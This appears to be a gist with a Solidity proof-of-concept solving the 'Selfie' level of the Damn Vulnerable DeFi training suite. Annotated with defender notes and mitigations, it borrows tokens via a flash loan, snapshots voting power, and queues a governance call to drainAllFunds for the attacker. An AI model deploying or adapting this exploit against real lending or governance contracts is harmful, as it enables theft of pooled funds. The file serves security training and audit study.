Created
January 28, 2023 18:29
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
// SPDX-License-Identifier: MIT | |
pragma solidity ^0.8.0; | |
/// @notice Minimal view of the lending pool that this proof of concept talks to.
/// @dev Only the one function called from this file is declared. The pool's
///      implementation is not part of this page.
interface ISelfiePool {
    /// @notice Requests a flash loan of `borrowAmount` tokens.
    /// @dev NOTE(review): SelfieExploit implements `receiveTokens(address,uint256)`,
    ///      presumably the callback the pool invokes during the loan; confirm
    ///      against the pool source.
    function flashLoan(uint256 borrowAmount) external;
}
/// @notice Minimal view of the governance contract: queue an action, then execute it.
/// @dev The governance implementation is not shown on this page, so any rule it
///      applies when queueing or executing (voting weight, delay) has to be
///      checked in its own source.
interface ISimpleGovernance {
    /// @notice Queues a call to `receiver` carrying `data` and `weiAmount` wei.
    /// @param receiver Address the queued call will target.
    /// @param data ABI-encoded calldata of the queued call.
    /// @param weiAmount Wei to forward with the queued call.
    /// @return Identifier of the queued action (stored by the caller in this file).
    function queueAction(address receiver, bytes calldata data, uint256 weiAmount)
        external
        returns (uint256);

    /// @notice Executes a previously queued action.
    /// @param actionId Identifier returned by `queueAction`.
    function executeAction(uint256 actionId) external payable;
}
/// @notice Minimal view of the loaned token: an ERC20-style transfer plus a
///         snapshot trigger.
/// @dev NOTE(review): as declared here, `snapshot()` is external with no visible
///      access restriction. Whether the real token restricts it cannot be seen
///      from this page; a defender reviewing the token should check that first.
interface ITokenSnapshot {
    /// @notice Records a balance snapshot.
    /// @return Presumably the id of the new snapshot; confirm against the token source.
    function snapshot() external returns (uint256);

    /// @notice Transfers `amount` tokens to `recipient`.
    /// @return Success flag reported by the token.
    function transfer(address recipient, uint256 amount) external returns (bool);
}
/// @title SelfieExploit
/// @notice Proof of concept that combines a flash loan with a governance proposal.
/// @dev The identifiers match the "Selfie" level of the Damn Vulnerable DeFi
///      training suite; presumably this is a solution to that exercise.
///
///      What the code shows: while holding flash-loaned tokens it triggers a
///      token snapshot, queues a governance action that calls
///      `drainAllFunds(address)` on the pool, and repays the loan. The queued
///      action is executed later through `execute()`.
///
///      Defender's reading (the pool, token and governance sources are not on
///      this page, so confirm each point there): the sequence only works if
///      governance weight is read from a snapshot that a borrower can take while
///      holding borrowed tokens. Typical mitigations are restricting who may
///      trigger snapshots, measuring voting power from a checkpoint that predates
///      the proposal, and not letting the pool's own lendable token be the sole
///      gate on privileged pool functions.
contract SelfieExploit {
    /// @notice Lending pool that provides the flash loan and is the target of the queued action.
    ISelfiePool public immutable pool;
    // Address passed as the argument of the queued `drainAllFunds(address)` call.
    address attacker;
    /// @notice Governance contract used to queue and execute the action.
    ISimpleGovernance public immutable gov;
    // Id returned by `queueAction`; zero until `receiveTokens` has run.
    uint256 actionId;

    /// @param _pool Address of the lending pool.
    /// @param _attacker Address encoded into the queued call.
    /// @param _gov Address of the governance contract.
    constructor(address _pool, address _attacker, address _gov) {
        gov = ISimpleGovernance(_gov);
        attacker = _attacker;
        pool = ISelfiePool(_pool);
    }

    /// @notice Starts the sequence by requesting a flash loan from the pool.
    /// @dev NOTE(review): no caller restriction; any address can invoke this.
    /// @param borrowAmount Amount of tokens to borrow.
    function attack(uint256 borrowAmount) external {
        pool.flashLoan(borrowAmount);
    }

    /// @notice Takes a snapshot, queues the governance action and returns the tokens.
    /// @dev NOTE(review): declared `public` with no check that the caller is the
    ///      pool, so `token` and `borrowAmount` are caller-controlled. The bool
    ///      returned by `transfer` is also ignored.
    /// @param token Token contract to snapshot and transfer.
    /// @param borrowAmount Amount transferred back to the pool.
    function receiveTokens(address token, uint256 borrowAmount) public {
        ITokenSnapshot loanToken = ITokenSnapshot(token);

        // The snapshot is taken while this contract still holds the borrowed balance.
        loanToken.snapshot();

        // Calldata for the pool function that the queued action will invoke.
        bytes memory payload = abi.encodeWithSignature("drainAllFunds(address)", attacker);
        actionId = gov.queueAction(address(pool), payload, 0);

        // Hand the borrowed amount back to the pool.
        loanToken.transfer(address(pool), borrowAmount);
    }

    /// @notice Executes the action queued in `receiveTokens`.
    /// @dev Forwards no value although `executeAction` is payable. If nothing
    ///      was queued, `actionId` is still zero and that id is passed through.
    function execute() external {
        gov.executeAction(actionId);
    }
}